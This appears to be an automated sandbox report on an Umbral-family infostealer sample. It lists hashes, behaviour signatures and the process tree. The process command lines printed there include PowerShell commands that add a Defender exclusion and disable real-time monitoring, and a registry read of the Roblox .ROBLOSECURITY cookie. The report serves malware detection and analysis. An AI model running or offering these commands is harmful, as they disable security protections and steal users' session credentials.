Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
12-05-2024 19:07
General
-
Target
STEALERRR3000PRO.exe
-
Size
231KB
-
MD5
5a006cd74e0225a15746bee6928d62f1
-
SHA1
a17dabdb634d9667c3590436998252148a5fab92
-
SHA256
0350fdb32852f781665e056a04f318e94c746612f7b4e3cd430d808c894aae4c
-
SHA512
59d6b467cf48cf1aafaf13e1acfdd6ae4806403f0bc92e759590b04da4ecd719488300ecd412d92931e7b65daf0ab2229d7a165b31595334676b40942bb30f81
-
SSDEEP
6144:xloZM9rIkd8g+EtXHkv/iD4gQYPDJ6idFIJbGmTTNb8e1mvmoii:DoZOL+EP8gQYPDJ6idFIJbGmTxro3
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1748-1-0x000001E1CF5F0000-0x000001E1CF630000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3132 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts STEALERRR3000PRO.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 4 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3960 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2424 PING.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3132 powershell.exe 3132 powershell.exe 2712 powershell.exe 2712 powershell.exe 4716 powershell.exe 4716 powershell.exe 2936 powershell.exe 2936 powershell.exe 3156 powershell.exe 3156 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1748 STEALERRR3000PRO.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 4716 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeIncreaseQuotaPrivilege 3884 wmic.exe Token: SeSecurityPrivilege 3884 wmic.exe Token: SeTakeOwnershipPrivilege 3884 wmic.exe Token: SeLoadDriverPrivilege 3884 wmic.exe Token: SeSystemProfilePrivilege 3884 wmic.exe Token: SeSystemtimePrivilege 3884 wmic.exe Token: SeProfSingleProcessPrivilege 3884 wmic.exe Token: SeIncBasePriorityPrivilege 3884 wmic.exe Token: SeCreatePagefilePrivilege 3884 wmic.exe Token: SeBackupPrivilege 3884 wmic.exe Token: SeRestorePrivilege 3884 wmic.exe Token: SeShutdownPrivilege 3884 wmic.exe Token: SeDebugPrivilege 3884 wmic.exe Token: SeSystemEnvironmentPrivilege 3884 wmic.exe Token: SeRemoteShutdownPrivilege 3884 wmic.exe Token: SeUndockPrivilege 3884 wmic.exe Token: SeManageVolumePrivilege 3884 wmic.exe Token: 33 3884 wmic.exe Token: 34 3884 wmic.exe Token: 35 3884 wmic.exe Token: 36 3884 wmic.exe Token: SeIncreaseQuotaPrivilege 3884 wmic.exe Token: SeSecurityPrivilege 3884 wmic.exe Token: SeTakeOwnershipPrivilege 3884 wmic.exe Token: SeLoadDriverPrivilege 3884 wmic.exe Token: SeSystemProfilePrivilege 3884 wmic.exe Token: SeSystemtimePrivilege 3884 wmic.exe Token: SeProfSingleProcessPrivilege 3884 wmic.exe Token: SeIncBasePriorityPrivilege 3884 wmic.exe Token: SeCreatePagefilePrivilege 3884 wmic.exe Token: SeBackupPrivilege 3884 wmic.exe Token: SeRestorePrivilege 3884 wmic.exe Token: SeShutdownPrivilege 3884 wmic.exe Token: SeDebugPrivilege 3884 wmic.exe Token: SeSystemEnvironmentPrivilege 3884 wmic.exe Token: SeRemoteShutdownPrivilege 3884 wmic.exe Token: SeUndockPrivilege 3884 wmic.exe Token: SeManageVolumePrivilege 3884 wmic.exe Token: 33 3884 wmic.exe Token: 34 3884 wmic.exe Token: 35 3884 wmic.exe Token: 36 3884 wmic.exe Token: SeIncreaseQuotaPrivilege 3220 wmic.exe Token: SeSecurityPrivilege 3220 wmic.exe Token: SeTakeOwnershipPrivilege 3220 wmic.exe Token: SeLoadDriverPrivilege 3220 wmic.exe Token: SeSystemProfilePrivilege 3220 wmic.exe Token: SeSystemtimePrivilege 3220 wmic.exe Token: SeProfSingleProcessPrivilege 3220 wmic.exe Token: SeIncBasePriorityPrivilege 3220 wmic.exe Token: SeCreatePagefilePrivilege 3220 wmic.exe Token: SeBackupPrivilege 3220 wmic.exe Token: SeRestorePrivilege 3220 wmic.exe Token: SeShutdownPrivilege 3220 wmic.exe Token: SeDebugPrivilege 3220 wmic.exe Token: SeSystemEnvironmentPrivilege 3220 wmic.exe Token: SeRemoteShutdownPrivilege 3220 wmic.exe Token: SeUndockPrivilege 3220 wmic.exe Token: SeManageVolumePrivilege 3220 wmic.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1748 wrote to memory of 5076 1748 STEALERRR3000PRO.exe 80 PID 1748 wrote to memory of 5076 1748 STEALERRR3000PRO.exe 80 PID 1748 wrote to memory of 3132 1748 STEALERRR3000PRO.exe 82 PID 1748 wrote to memory of 3132 1748 STEALERRR3000PRO.exe 82 PID 1748 wrote to memory of 2712 1748 STEALERRR3000PRO.exe 84 PID 1748 wrote to memory of 2712 1748 STEALERRR3000PRO.exe 84 PID 1748 wrote to memory of 4716 1748 STEALERRR3000PRO.exe 86 PID 1748 wrote to memory of 4716 1748 STEALERRR3000PRO.exe 86 PID 1748 wrote to memory of 2936 1748 STEALERRR3000PRO.exe 88 PID 1748 wrote to memory of 2936 1748 STEALERRR3000PRO.exe 88 PID 1748 wrote to memory of 3884 1748 STEALERRR3000PRO.exe 90 PID 1748 wrote to memory of 3884 1748 STEALERRR3000PRO.exe 90 PID 1748 wrote to memory of 3220 1748 STEALERRR3000PRO.exe 93 PID 1748 wrote to memory of 3220 1748 STEALERRR3000PRO.exe 93 PID 1748 wrote to memory of 688 1748 STEALERRR3000PRO.exe 96 PID 1748 wrote to memory of 688 1748 STEALERRR3000PRO.exe 96 PID 1748 wrote to memory of 3156 1748 STEALERRR3000PRO.exe 98 PID 1748 wrote to memory of 3156 1748 STEALERRR3000PRO.exe 98 PID 1748 wrote to memory of 3960 1748 STEALERRR3000PRO.exe 100 PID 1748 wrote to memory of 3960 1748 STEALERRR3000PRO.exe 100 PID 1748 wrote to memory of 2748 1748 STEALERRR3000PRO.exe 102 PID 1748 wrote to memory of 2748 1748 STEALERRR3000PRO.exe 102 PID 2748 wrote to memory of 2424 2748 cmd.exe 104 PID 2748 wrote to memory of 2424 2748 cmd.exe 104 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5076 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe"C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe"2⤵
- Views/modifies file attributes
PID:5076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3156
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:3960
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe" && pause2⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:2424
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
Filesize
948B
MD5441a842138038e6385e430a90d7ea608
SHA17b3712d2cdd37e10ee9b3994131ee5175e920f01
SHA25647592f3324179912d3bdba336b9e75568c2c5f1a9fb37c1ba9f0db9df822164c
SHA5129dbddc3216f2a132ae3961b3aeac2c5b8828dcc9292f6c5bf1171c47453aa8687f92658818d771413492c0ea565e9ede17b9c03e427af9dc2ac21a78369a6666
-
Filesize
1KB
MD5f29ff8b1e0f396a194a6782749830b8e
SHA12f8999b0eb2a20e591cf9a638c9fa84ddf4a1f69
SHA2565bfd4968395fefaac3941c08fa11e86dfde1072137d9290aee3888f2a5d92d3f
SHA5120689d665f2a7c9007c5dc4c14a53d5566d315d05d476bee82d64d02d40e3ffddca2b36419c76a8f7b7979958a62a7a93c939d1ed72fa7a844841ed06741b9e19
-
Filesize
1KB
MD5e8ad350bb24c7ab38efd0ef0553239c7
SHA1887c19e4c11de19854458e26a1ed05b67a75bf29
SHA2565cf85b38cbbf1a064a4f8001a0ec031993d44e46b8e65d713785c84916cb8ffd
SHA51274fef147e98b8b576712c212174a7793deb619d54c7ac7956e38ed4e09202f0c93ae4ec9e89cd4d0ac79c481d30c5c3fc5a3d042537c74d7bffda1f8453aef6e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82